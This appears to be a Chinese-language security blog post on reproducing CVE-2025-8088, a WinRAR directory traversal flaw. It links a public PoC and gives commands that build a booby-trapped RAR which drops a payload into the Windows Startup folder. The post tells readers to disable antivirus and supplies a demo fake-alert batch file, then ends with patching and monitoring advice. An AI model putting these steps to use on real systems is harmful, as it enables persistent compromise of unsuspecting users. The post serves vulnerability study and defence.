news 2026/4/16 14:02:06

CVE-2025-8088:WinRAR <=7.12 目录穿越漏洞的复现步骤、PoC 使用与应急防护建议

作者头像

张小明

前端开发工程师

1.2k 24
文章封面图
CVE-2025-8088:WinRAR <=7.12 目录穿越漏洞的复现步骤、PoC 使用与应急防护建议

漏洞概述

漏洞摘要
7.12 及以下版本的 WinRAR 存在目录穿越漏洞(CVE-2025-8088)。在攻击者已知“用户文件夹名”或其他环境信息的前提下,可构造恶意 RAR 文件并诱导用户解压,从而将恶意文件释放到任意路径(例如开机启动目录)。若满足权限条件,攻击者甚至可借此获取持久化执行或完全控制目标主机。2025-07-30 WinRAR 已发布修复版本7.13


漏洞环境

(说明:当前 WinRAR 版本 ≤ 7.12)


PoC(来源与使用)

PoC 仓库:

https://github.com/sxyrxyy/CVE-2025-8088-WinRAR-Proof-of-Concept-PoC-Exploit-

示例用法

python poc.py --decoy resume.txt --payload payload.bat --drop"C:\Users\you\Documents"--rar"C:\Program Files\WinRAR\rar.exe"

参数说明:

  • --decoy:钓鱼/诱饵文件,用户解压后看到的正常文件(例如resume.txt)。
  • --payload:实际要落地并执行的可执行文件(例如payload.bat)。
  • --drop:落地路径(可为任意可写路径,示例中可以改为启动项目录)。
  • --rar:本地rar.exe或 WinRAR 的可执行程序路径。

示例将落地路径改为用户启动项:

C:\Users\<用户名>\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup

实验准备(复现步骤)

安全说明
本文档的复现操作仅限授权的测试环境或虚拟机内进行,切勿在未授权的真实系统上运行 PoC 或 payload。滥用漏洞利用代码将触犯法律并承担相应责任。

1. 关闭杀软(测试环境内)

为避免误报或拦截,复现时请在隔离的虚拟机内短暂关闭杀毒/安全软件(仅限授权测试)。

2. 准备 payload(示例为 .bat)

payload.bat示例(仅作演示弹窗,请勿用于真实破坏):

@echo off chcp 65001 >nul title 系统安全警告 mode con cols=50 lines=15 color 4F cls echo. echo **************************************************** echo * * echo * 系统安全警报 * echo * * echo * 检测到严重的安全威胁! * echo * * echo * 您的计算机已被病毒感染!!! * echo * * echo * 所有文件将在30秒内被删除 * echo * * echo **************************************************** echo. echo 威胁等级: [%%%%%%%%%%%%%%%%%%%%] 100%% 危险 echo. echo 按任意键关闭此警告... pause >nul

3. 准备钓鱼文件(decoy)

示例:1.txt(或resume.txt)用于欺骗用户。

4. 在 PoC 目录执行构建命令

python3 poc.py --decoy1.txt --payload payload.bat --drop"C:\Users\<用户名>\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"--rar"C:\Program Files\WinRAR\rar.exe"

执行后将生成示例压缩包(例如cve-2025-8088-sxy-poc.rar)。


解压与复现结果

  1. 将生成的.rar文件放到桌面或其他可访问位置:若直接在某目录解压报错,可尝试复制到桌面再解压。
  2. 使用 WinRAR 解压(注意:不同目录或权限可能导致不同错误或失败):

  1. 解压成功后在目标路径(例如 Startup)会出现 payload,达到持久化/开机自启效果:


漏洞危害(要点)

  • 隐蔽性高:利用 NTFS 的 Alternate Data Streams(ADS)等机制,恶意内容可隐藏在正常文件中,常规浏览难以发现。
  • 极低交互成本:用户仅需解压压缩包,无需双击可执行文件即可触发落地(取决于 payload 类型和系统配置)。
  • 后果严重:可植入启动项、覆盖关键文件、触发蓝屏或实现持久化远程控制。

紧急防护建议(操作步骤)

  1. 立即更新 WinRAR(首要且最有效的措施)

前往 WinRAR 官方站点下载安装7.13及以上版本(WinRAR 官方中国站: https://www.winrar.com.cn/ )。

  1. 禁用或限制 NTFS ADS(企业环境可考虑)

说明:Windows 对 ADS 的直接禁用支持有限,下述命令并不是在所有系统版本/配置上都有效。企业应通过组策略、端点安全策略或文件系统审计来减少 ADS 滥用风险。

fsutil behavior set disable8dot3 1 :: 禁用短文件名(间接减少某些滥用方式) fsutil behavior set streams 1 :: 在部分系统上可用于控制 ADS(请在测试环境验证)
  1. 不要在不可信来源解压 RAR 文件

对来自邮件附件、论坛或未知来源的压缩包保持怀疑;先使用沙箱或线上/本地杀毒引擎扫描。

  1. 监控关键目录与文件完整性

定期检查常被滥用的路径,如:

%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup C:\Windows\System32 %USERPROFILE%\AppData\Roaming
  1. 开启并更新终端安全产品

主流杀毒软件(例如 360、安全管家、火绒 等)通常会推送针对该利用链的检测规则;确保签名/规则库为最新并开启实时防护。


参考与扩展阅读

  • https://blog.csdn.net/m0_73610345/article/details/151190831
  • https://www.cnblogs.com/solitude1223/p/19073390
  • https://bbs.kanxue.com/thread-288363.htm

免责声明

本文档的复现步骤仅用于授权的安全测试环境与教学研究;禁止将漏洞利用代码用于未授权的第三方系统。请遵守当地法律法规及信息安全伦理。

版权声明: 本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若内容造成侵权/违法违规/事实不符,请联系邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!
网站建设 2026/4/16 12:16:48

SVM支持向量机

一、SVM基本原理1.1 什么是支持向量机&#xff1f;支持向量机是一种监督学习算法&#xff0c;主要用于分类和回归分析。其核心思想是找到一个最优超平面&#xff0c;使得不同类别的数据点能够被最大间隔分开。这个"最大间隔"正是SVM得名的原因——算法会寻找那些对分…

作者头像 李华
网站建设 2026/4/16 0:59:53

基于JavaWeb的在线天气查询系统源码设计与文档

前言基于 JavaWeb 的在线天气查询系统&#xff0c;直击用户 “天气数据分散、查询繁琐、信息展示不直观、缺乏场景化服务” 的核心痛点&#xff0c;依托 JavaWeb 的跨平台适配与稳定运行优势&#xff0c;构建 “多源数据整合 精准查询 场景化赋能” 的一体化天气服务平台。传…

作者头像 李华
网站建设 2026/4/16 12:17:48

可溶性蛋白表达指南:原理、系统与策略解析

在重组蛋白研究与制备领域&#xff0c;获得高产量、高活性的目标蛋白是核心目标。其中&#xff0c;可溶性蛋白表达是实现这一目标的关键环节。与以不溶性聚集形式存在的包涵体不同&#xff0c;可溶性表达的蛋白能正确折叠&#xff0c;以其天然或具有生物活性的构象存在于细胞浆…

作者头像 李华
网站建设 2026/4/16 12:20:27

Zotero重复条目合并插件终极指南:5分钟掌握智能去重高效方法

Zotero重复条目合并插件终极指南&#xff1a;5分钟掌握智能去重高效方法 【免费下载链接】ZoteroDuplicatesMerger A zotero plugin to automatically merge duplicate items 项目地址: https://gitcode.com/gh_mirrors/zo/ZoteroDuplicatesMerger 还在为文献库中大量的…

作者头像 李华
网站建设 2026/4/16 12:21:38

Wan2.2-T2V-A14B推动AIGC视频商业化落地的新模式

Wan2.2-T2V-A14B&#xff1a;推动AIGC视频商业化落地的新范式 在短视频日活突破十亿、内容竞争白热化的今天&#xff0c;品牌方和创作者正面临一个尴尬的现实&#xff1a;优质视频内容的需求呈指数级增长&#xff0c;而专业制作的成本与周期却居高不下。一支30秒广告从创意到成…

作者头像 李华
网站建设 2026/4/16 13:56:36

Vue滑块组件终极指南:从基础到高级实战应用

Vue滑块组件终极指南&#xff1a;从基础到高级实战应用 【免费下载链接】vue-slider-component &#x1f321; A highly customized slider component 项目地址: https://gitcode.com/gh_mirrors/vu/vue-slider-component 在Vue项目开发中&#xff0c;滑块控件是构建交互…

作者头像 李华